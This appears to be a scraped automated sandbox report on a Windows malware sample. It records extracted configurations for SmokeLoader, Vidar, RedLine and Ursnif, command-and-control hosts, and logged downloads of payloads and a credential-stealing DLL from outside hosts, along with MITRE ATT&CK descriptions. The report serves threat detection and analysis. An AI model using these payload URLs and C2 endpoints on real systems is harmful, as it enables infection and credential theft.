Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	Avira: detection malicious, Label: HEUR/AGEN.1233121
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	Avira: detection malicious, Label: HEUR/AGEN.1233121

Source: C:\Users\user\AppData\Local\Temp\F771.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\cttgcew	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B4A7.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A852.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\E35A.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\CF35.exe	Joe Sandbox ML: detected

Source: 0000000B.00000002.393943988.00000000025E1000.00000004.10000000.00040000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://o3l3roozuidudu.com/", "http://o3npxslymcyfi2.com/", "http://o3b1wk8sfk74tf.com/"]}
Source: 0000001F.00000002.471247692.0000000000C50000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://t.me/deadftx", "https://www.tiktok.com/@user6068972597711"], "Botnet": "1148", "Version": "55.7"}
Source: 00000020.00000002.848936854.000000000263A000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "185.106.92.111:2510", "Bot Id": "New2022", "Authorization Header": "ef6fe7baf59e3191ff2f569e3bf0e2c7"}
Source: 00000018.00000002.792008341.0000000000870000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Ursnif {"RSA Public Key": "9YTR8AStfTOVxekPy7nye/rJL/CYnuMKiTBMit/N9dFJomCZQw3gdJ20hYjZiaY5PCNTRgc/z2gXfPlfCRRq0/mF+oSBOgliUoJHNN6O1Nl/zAv1hC+MVoITbvAJoj6LnOzFs9h/l3E4DMphz+dHiiDgppDXx4StPfi30EoQByvOIhjndZV3g8kYMJyGj8dxlmi3X9wSz6RHT9/HWCOS/i2phbREwr7oohHwh6mObxVhJVx0tZ18f2U+SsDunGdf1nLcyWHfM0cx6e8zBNRaXlZ1HhTEFzQdz5EF2h+r74n2bFODhb+ozhtKQ1CBEf0hf+5D8mLZuH2C+VOO+s90bjJxpTvGseErYwzAwE2lC4o=", "c2_domain": ["lentaphoto.at", "iujdhsndjfks.ru", "gameindikdowd.ru", "jhgfdlkjhaoiu.su"], "botnet": "20", "server": "50", "serpent_key": "izoHlMTDxrB6IFB3", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Source: Joe Sandbox View	JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox View	JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Nov 2022 15:58:18 GMTContent-Type: application/octet-streamContent-Length: 385536Last-Modified: Sat, 19 Nov 2022 15:55:01 GMTConnection: keep-aliveETag: "6378fc55-5e200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 50 16 95 a1 31 78 c6 a1 31 78 c6 a1 31 78 c6 bf 63 ed c6 b5 31 78 c6 bf 63 fb c6 21 31 78 c6 bf 63 fc c6 8f 31 78 c6 86 f7 03 c6 a2 31 78 c6 a1 31 79 c6 db 31 78 c6 bf 63 f2 c6 a0 31 78 c6 bf 63 ec c6 a0 31 78 c6 bf 63 e9 c6 a0 31 78 c6 52 69 63 68 a1 31 78 c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a5 e4 9d 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 2a 01 00 00 b6 44 00 00 00 00 00 9a 50 00 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 46 00 00 04 00 00 61 5a 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 2f 01 00 28 00 00 00 00 70 43 00 78 45 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 45 00 a8 0b 00 00 d0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 2d 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 52 28 01 00 00 10 00 00 00 2a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 2a 42 00 00 40 01 00 00 2a 02 00 00 2e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 45 02 00 00 70 43 00 00 46 02 00 00 58 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 92 42 00 00 00 c0 45 00 00 44 00 00 00 9e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Nov 2022 15:58:49 GMTContent-Type: application/octet-streamContent-Length: 129024Last-Modified: Wed, 09 Nov 2022 16:43:53 GMTConnection: keep-aliveETag: "636bd8c9-1f800"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 9c 01 00 00 58 00 00 00 00 00 00 7c aa 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 4f 00 00 00 00 e0 01 00 26 0e 00 00 00 20 02 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 e0 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 94 9a 01 00 00 10 00 00 00 9c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 b4 13 00 00 00 b0 01 00 00 14 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 e1 09 00 00 00 d0 01 00 00 00 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 26 0e 00 00 00 e0 01 00 00 10 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 4f 00 00 00 00 f0 01 00 00 02 00 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 e0 1d 00 00 00 00 02 00 00 1e 00 00 00 c6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 14 00 00 00 20 02 00 00 14 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 00 00 00 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	TCP traffic: 192.168.2.3:49801 -> 212.8.246.157:32348
Source: global traffic	TCP traffic: 192.168.2.3:49824 -> 65.21.213.208:3000
Source: global traffic	TCP traffic: 192.168.2.3:49893 -> 185.106.92.111:2510

Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /mmm.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: srshf.com
Source: global traffic	HTTP traffic detected: GET /2bibu4 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: iplogger.com
Source: global traffic	HTTP traffic detected: GET /p8DdCeH9yd/c1844f86-1668548628/TELEGRAM.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-102.anonfiles.com
Source: global traffic	HTTP traffic detected: GET /p8DdCeH9yd HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: anonfiles.com
Source: global traffic	HTTP traffic detected: GET /get/3m3jFz/A.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
Source: global traffic	HTTP traffic detected: GET /ugzpqm9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: hoteldostyk.com
Source: global traffic	HTTP traffic detected: GET /get/tSjRYH/19a79daddfaac09499e79ade27e756f8.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
Source: global traffic	HTTP traffic detected: GET /decoder1989/Wallet/raw/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic	HTTP traffic detected: GET /decoder1989/Wallet/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /globallinstall/updatenow1.3.5/downloads/downloadsupdated.now-1.3.5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /d4f3490a-2e84-4c12-88ef-beba9da933c3/downloads/82212016-bde4-4df5-aab8-956b348984a7/downloadsupdated.now-1.3.5.exe?response-content-disposition=attachment%3B%20filename%3D%22downloadsupdated.now-1.3.5.exe%22&AWSAccessKeyId=ASIA6KOSE3BNOZOOHY3N&Signature=GzL5wNnYpYwPSxOn1UYsedXak5E%3D&x-amz-security-token=FwoGZXIvYXdzEGkaDDNVNRyg9tKrdDSjmyK%2BAXLhpeezu2dvyjwAVkUCy7lu%2FXCp1HgdKpL8mWGBdvveL8Mo1QmIKfJ8iZDr9Xw%2BctzLwJ5Sf8n0lCS3jHhbhlYs0X0busuSvW%2FVq%2FfMaY78aRaS988rXTG%2FflifkvhzKIeH%2BV49O7mXy47GBzjy3fPmNnCGaKTJZeSSWbSd72NLL%2BaCGtTc9Tc3XZ5ZqTwHNQpXotjT6eruy14GLWwhFcV6JdFES%2Flh7KQl3xIhJb9lB%2FMhsn%2BO2tK9c9Nn06YoifbjmwYyLaTpvNZdDFBcQvsXCLyHYDaiEW7KrV%2Fc7h%2BKDDqJqtgq%2BRvSwG3A3zzYSvK0GQ%3D%3D&Expires=1668874769 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /deadftx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic	HTTP traffic detected: GET /getAccountSwitcherEndpoint HTTP/1.1Host: www.youtube.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /mia/solt.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.56.146.168
Source: global traffic	HTTP traffic detected: GET /g84kvj4jck/Plugins/cred64.dll HTTP/1.1Host: 193.56.146.174
Source: global traffic	HTTP traffic detected: GET /1148 HTTP/1.1Host: 116.202.5.101
Source: global traffic	HTTP traffic detected: GET /446391140202.zip HTTP/1.1Host: 116.202.5.101Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uploaded/MKJXzaDhWJDhe4sLrAp/202wE1vmJGyOwE4wnEYueW/_2FfFWmpLaA_2/F_2BQz5L/X3BHK9zQ3HPerTbhJpXzdiC/pUWTziFQ6a/6yCvS5D9SUcdt4sBF/gRv1MAfNJypf/45_2BAajPNT/d0DhscZUUsYYbj/GTcrjG7fiLjLppaaVvzrf/Y24KXriHXc3NY43T/ctpVATPI_2Fr0Pi/_2FHw6oRT9JyY2ksfC/Ba_2BHWOY/RtKKX_2BievpS4UJpDK8/QiXiZjxP9y_2Fi9Irvn/1tIj7yvgcoxlqHZDD_2FkN/cDourswJ/7.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: iujdhsndjfks.ruConnection: Keep-AliveCache-Control: no-cache

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report q4Z52wRd28.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: RedLine

Threatname: Ursnif

Threatname: SmokeLoader

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\07477506288530029273670714

C:\ProgramData\34118869306534953191217255

C:\ProgramData\39680000161077974836781923

C:\ProgramData\42917201296364153697665931

C:\ProgramData\45253720055769576867799735

C:\ProgramData\65329382289861898742549564

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll

Windows Analysis Report
q4Z52wRd28.exe

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre